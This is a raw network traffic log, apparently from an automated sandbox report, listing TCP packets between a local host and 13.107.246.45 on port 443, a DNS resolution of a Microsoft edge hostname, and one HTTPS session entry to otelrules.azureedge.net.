Oct 30, 2024 03:47:16.918071985 CET50000443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.918080091 CET4435000013.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.921201944 CET50005443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.921225071 CET4435000513.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.921318054 CET50005443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.921485901 CET50005443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.921498060 CET4435000513.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.954935074 CET4435000113.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.955463886 CET50001443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.955476999 CET4435000113.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.955939054 CET50001443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.955950022 CET4435000113.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.997188091 CET4435000213.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.997967005 CET50002443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.998008013 CET4435000213.107.246.45192.168.2.4
Oct 30, 2024 03:47:16.998423100 CET50002443192.168.2.413.107.246.45
Oct 30, 2024 03:47:16.998440027 CET4435000213.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.082021952 CET4435000313.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.082464933 CET50003443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.082475901 CET4435000313.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.083283901 CET50003443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.083291054 CET4435000313.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.087061882 CET4435000113.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.087094069 CET4435000113.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.087135077 CET50001443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.087150097 CET4435000113.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.087167025 CET4435000113.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.087224007 CET50001443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.087385893 CET50001443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.087402105 CET4435000113.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.087414026 CET50001443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.087419987 CET4435000113.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.091011047 CET50006443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.091057062 CET4435000613.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.091126919 CET50006443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.091522932 CET50006443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.091541052 CET4435000613.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.127753973 CET4435000213.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.128083944 CET4435000213.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.128125906 CET50002443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.128173113 CET50002443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.128190041 CET4435000213.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.128201962 CET50002443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.128207922 CET4435000213.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.130976915 CET50007443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.131007910 CET4435000713.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.131074905 CET50007443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.131371975 CET50007443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.131386995 CET4435000713.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.215987921 CET4435000313.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.216137886 CET4435000313.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.216202974 CET50003443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.216294050 CET50003443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.216310978 CET4435000313.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.216324091 CET50003443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.216330051 CET4435000313.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.219118118 CET50008443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.219167948 CET4435000813.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.219240904 CET50008443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.219386101 CET50008443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.219398022 CET4435000813.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.425709009 CET4435000413.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.426245928 CET50004443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.426276922 CET4435000413.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.426753998 CET50004443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.426763058 CET4435000413.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.556305885 CET4435000413.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.556384087 CET4435000413.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.556435108 CET50004443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.556602955 CET50004443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.556624889 CET4435000413.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.556637049 CET50004443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.556643963 CET4435000413.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.559678078 CET50009443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.559709072 CET4435000913.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.559787989 CET50009443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.559988022 CET50009443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.560003042 CET4435000913.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.658216000 CET4435000513.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.658802986 CET50005443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.658828020 CET4435000513.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.659197092 CET50005443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.659204006 CET4435000513.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.788944006 CET4435000513.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.789016962 CET4435000513.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.789074898 CET50005443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.789215088 CET50005443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.789230108 CET4435000513.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.789242029 CET50005443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.789248943 CET4435000513.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.791755915 CET50010443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.791867971 CET4435001013.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.791960955 CET50010443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.792131901 CET50010443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.792166948 CET4435001013.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.835952044 CET4435000613.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.836550951 CET50006443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.836568117 CET4435000613.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.837107897 CET50006443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.837112904 CET4435000613.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.860153913 CET4435000713.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.860572100 CET50007443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.860580921 CET4435000713.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.861030102 CET50007443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.861037016 CET4435000713.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.952507973 CET4435000813.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.953249931 CET50008443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.953274012 CET4435000813.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.953722000 CET50008443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.953728914 CET4435000813.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.968471050 CET4435000613.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.968504906 CET4435000613.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.968605995 CET4435000613.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.968611956 CET50006443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.968662977 CET50006443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.968928099 CET50006443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.968944073 CET4435000613.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.968954086 CET50006443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.968959093 CET4435000613.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.971977949 CET50011443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.972004890 CET4435001113.107.246.45192.168.2.4
Oct 30, 2024 03:47:17.972095966 CET50011443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.972326040 CET50011443192.168.2.413.107.246.45
Oct 30, 2024 03:47:17.972345114 CET4435001113.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.001176119 CET4435000713.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.001204967 CET4435000713.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.001295090 CET50007443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.001311064 CET4435000713.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.001341105 CET50007443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.001437902 CET4435000713.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.001487970 CET50007443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.001555920 CET50007443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.001564980 CET4435000713.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.001580000 CET50007443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.001585007 CET4435000713.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.004107952 CET50012443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.004152060 CET4435001213.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.004236937 CET50012443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.004371881 CET50012443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.004388094 CET4435001213.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.204287052 CET4435000813.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.204310894 CET4435000813.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.204329967 CET4435000813.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.204442024 CET50008443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.204488993 CET4435000813.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.204561949 CET50008443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.206302881 CET4435000813.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.206352949 CET4435000813.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.206388950 CET50008443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.206444025 CET50008443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.206485987 CET4435000813.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.206526041 CET50008443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.206542015 CET4435000813.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.209306002 CET50013443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.209331036 CET4435001313.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.209408045 CET50013443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.209765911 CET50013443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.209778070 CET4435001313.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.289808989 CET4435000913.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.291568995 CET50009443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.291587114 CET4435000913.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.292184114 CET50009443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.292188883 CET4435000913.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.418891907 CET4435000913.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.418947935 CET4435000913.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.419063091 CET50009443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.419078112 CET4435000913.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.419114113 CET4435000913.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.419176102 CET50009443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.419358969 CET50009443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.419358969 CET50009443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.419368982 CET4435000913.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.419375896 CET4435000913.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.423115015 CET50014443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.423134089 CET4435001413.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.423213005 CET50014443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.423630953 CET50014443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.423645020 CET4435001413.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.549858093 CET4435001013.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.550359964 CET50010443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.550384045 CET4435001013.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.550870895 CET50010443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.550878048 CET4435001013.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.728651047 CET4435001113.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.729134083 CET50011443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.729151011 CET4435001113.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.729567051 CET50011443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.729573011 CET4435001113.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.743621111 CET4435001213.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.744277954 CET50012443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.744299889 CET4435001213.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.744739056 CET50012443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.744745970 CET4435001213.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.796205997 CET4435001013.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.796242952 CET4435001013.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.796257019 CET4435001013.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.796381950 CET50010443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.796422958 CET4435001013.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.796494007 CET50010443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.805870056 CET4435001013.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.805915117 CET4435001013.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.805944920 CET4435001013.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.805955887 CET50010443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.805984020 CET50010443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.806016922 CET50010443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.806135893 CET50010443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.806166887 CET4435001013.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.806193113 CET50010443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.806206942 CET4435001013.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.809096098 CET50015443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.809115887 CET4435001513.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.809212923 CET50015443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.809407949 CET50015443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.809420109 CET4435001513.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.861742973 CET4435001113.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.861778021 CET4435001113.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.861844063 CET4435001113.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.861864090 CET50011443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.861907959 CET50011443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.862190962 CET50011443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.862200975 CET4435001113.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.862215042 CET50011443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.862220049 CET4435001113.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.865433931 CET50016443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.865478992 CET4435001613.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.865590096 CET50016443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.865859985 CET50016443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.865878105 CET4435001613.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.874736071 CET4435001213.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.874762058 CET4435001213.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.874828100 CET4435001213.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.874841928 CET50012443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.874892950 CET50012443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.875119925 CET50012443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.875133991 CET4435001213.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.875145912 CET50012443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.875152111 CET4435001213.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.877836943 CET50017443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.877866030 CET4435001713.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.878000975 CET50017443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.878232002 CET50017443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.878251076 CET4435001713.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.972165108 CET4435001313.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.973010063 CET50013443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.973020077 CET4435001313.107.246.45192.168.2.4
Oct 30, 2024 03:47:18.973465919 CET50013443192.168.2.413.107.246.45
Oct 30, 2024 03:47:18.973469973 CET4435001313.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.107836008 CET4435001313.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.107893944 CET4435001313.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.108001947 CET50013443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.108217955 CET50013443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.108223915 CET4435001313.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.110793114 CET50018443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.110836029 CET4435001813.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.110905886 CET50018443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.111036062 CET50018443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.111052990 CET4435001813.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.182543993 CET4435001413.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.183001041 CET50014443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.183022022 CET4435001413.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.183427095 CET50014443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.183434010 CET4435001413.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.313904047 CET4435001413.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.313973904 CET4435001413.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.314043045 CET50014443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.314237118 CET50014443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.314254045 CET4435001413.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.314266920 CET50014443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.314273119 CET4435001413.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.317281961 CET50019443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.317307949 CET4435001913.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.317457914 CET50019443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.317679882 CET50019443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.317696095 CET4435001913.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.545063019 CET4435001513.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.545545101 CET50015443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.545557022 CET4435001513.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.545996904 CET50015443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.546001911 CET4435001513.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.590831041 CET4435001613.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.591320038 CET50016443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.591344118 CET4435001613.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.591862917 CET50016443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.591869116 CET4435001613.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.608192921 CET4435001713.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.608583927 CET50017443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.608603001 CET4435001713.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.609057903 CET50017443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.609065056 CET4435001713.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.676166058 CET4435001513.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.676255941 CET4435001513.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.676351070 CET50015443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.676584005 CET50015443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.676595926 CET4435001513.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.676604986 CET50015443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.676610947 CET4435001513.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.679718971 CET50020443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.679768085 CET4435002013.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.679874897 CET50020443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.680061102 CET50020443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.680077076 CET4435002013.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.724498987 CET4435001613.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.724574089 CET4435001613.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.724634886 CET50016443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.724759102 CET50016443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.724776983 CET4435001613.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.724787951 CET50016443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.724797964 CET4435001613.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.727485895 CET50021443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.727520943 CET4435002113.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.727598906 CET50021443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.727751970 CET50021443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.727767944 CET4435002113.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.737596035 CET4435001713.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.737646103 CET4435001713.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.737690926 CET50017443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.737705946 CET4435001713.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.737736940 CET4435001713.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.737781048 CET50017443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.737883091 CET50017443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.737900019 CET4435001713.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.737911940 CET50017443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.737917900 CET4435001713.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.854684114 CET4435001813.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.855236053 CET50018443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.855252981 CET4435001813.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.855679989 CET50018443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.855685949 CET4435001813.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.986730099 CET4435001813.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.986823082 CET4435001813.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.986881018 CET50018443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.987046957 CET50018443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.987061977 CET4435001813.107.246.45192.168.2.4
Oct 30, 2024 03:47:19.987071037 CET50018443192.168.2.413.107.246.45
Oct 30, 2024 03:47:19.987076044 CET4435001813.107.246.45192.168.2.4
Oct 30, 2024 03:47:20.061974049 CET4435001913.107.246.45192.168.2.4
Oct 30, 2024 03:47:20.062504053 CET50019443192.168.2.413.107.246.45
Oct 30, 2024 03:47:20.062529087 CET4435001913.107.246.45192.168.2.4
Oct 30, 2024 03:47:20.062973022 CET50019443192.168.2.413.107.246.45
Oct 30, 2024 03:47:20.062982082 CET4435001913.107.246.45192.168.2.4
Oct 30, 2024 03:47:20.195075035 CET4435001913.107.246.45192.168.2.4
Oct 30, 2024 03:47:20.195133924 CET4435001913.107.246.45192.168.2.4
Oct 30, 2024 03:47:20.195344925 CET50019443192.168.2.413.107.246.45
Oct 30, 2024 03:47:20.195391893 CET50019443192.168.2.413.107.246.45
Oct 30, 2024 03:47:20.195415974 CET4435001913.107.246.45192.168.2.4
Oct 30, 2024 03:47:20.195427895 CET50019443192.168.2.413.107.246.45
Oct 30, 2024 03:47:20.195435047 CET4435001913.107.246.45192.168.2.4
Oct 30, 2024 03:47:20.417628050 CET4435002013.107.246.45192.168.2.4
Oct 30, 2024 03:47:20.418353081 CET50020443192.168.2.413.107.246.45
Oct 30, 2024 03:47:20.418365002 CET4435002013.107.246.45192.168.2.4
Oct 30, 2024 03:47:20.418863058 CET50020443192.168.2.413.107.246.45
Oct 30, 2024 03:47:20.418867111 CET4435002013.107.246.45192.168.2.4
Oct 30, 2024 03:47:20.473305941 CET4435002113.107.246.45192.168.2.4
Oct 30, 2024 03:47:20.473797083 CET50021443192.168.2.413.107.246.45
Oct 30, 2024 03:47:20.473818064 CET4435002113.107.246.45192.168.2.4
Oct 30, 2024 03:47:20.474416971 CET50021443192.168.2.413.107.246.45
Oct 30, 2024 03:47:20.474431038 CET4435002113.107.246.45192.168.2.4
Oct 30, 2024 03:47:20.546792984 CET4435002013.107.246.45192.168.2.4
Oct 30, 2024 03:47:20.546895981 CET4435002013.107.246.45192.168.2.4
Oct 30, 2024 03:47:20.546982050 CET50020443192.168.2.413.107.246.45
Oct 30, 2024 03:47:20.547162056 CET50020443192.168.2.413.107.246.45
Oct 30, 2024 03:47:20.547179937 CET4435002013.107.246.45192.168.2.4
Oct 30, 2024 03:47:20.547188997 CET50020443192.168.2.413.107.246.45
Oct 30, 2024 03:47:20.547199965 CET4435002013.107.246.45192.168.2.4
Oct 30, 2024 03:47:20.605309963 CET4435002113.107.246.45192.168.2.4
Oct 30, 2024 03:47:20.605549097 CET4435002113.107.246.45192.168.2.4
Oct 30, 2024 03:47:20.605619907 CET50021443192.168.2.413.107.246.45
Oct 30, 2024 03:47:20.605659962 CET50021443192.168.2.413.107.246.45
Oct 30, 2024 03:47:20.605659962 CET50021443192.168.2.413.107.246.45
Oct 30, 2024 03:47:20.605684042 CET4435002113.107.246.45192.168.2.4
Oct 30, 2024 03:47:20.605695009 CET4435002113.107.246.45192.168.2.4
TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
Oct 30, 2024 03:46:30.293127060 CET1.1.1.1192.168.2.40xa6ddNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
Oct 30, 2024 03:46:30.293127060 CET1.1.1.1192.168.2.40xa6ddNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
  • otelrules.azureedge.net
Session IDSource IPSource PortDestination IPDestination Port
0192.168.2.44975413.107.246.45443
TimestampBytes transferredDirectionData
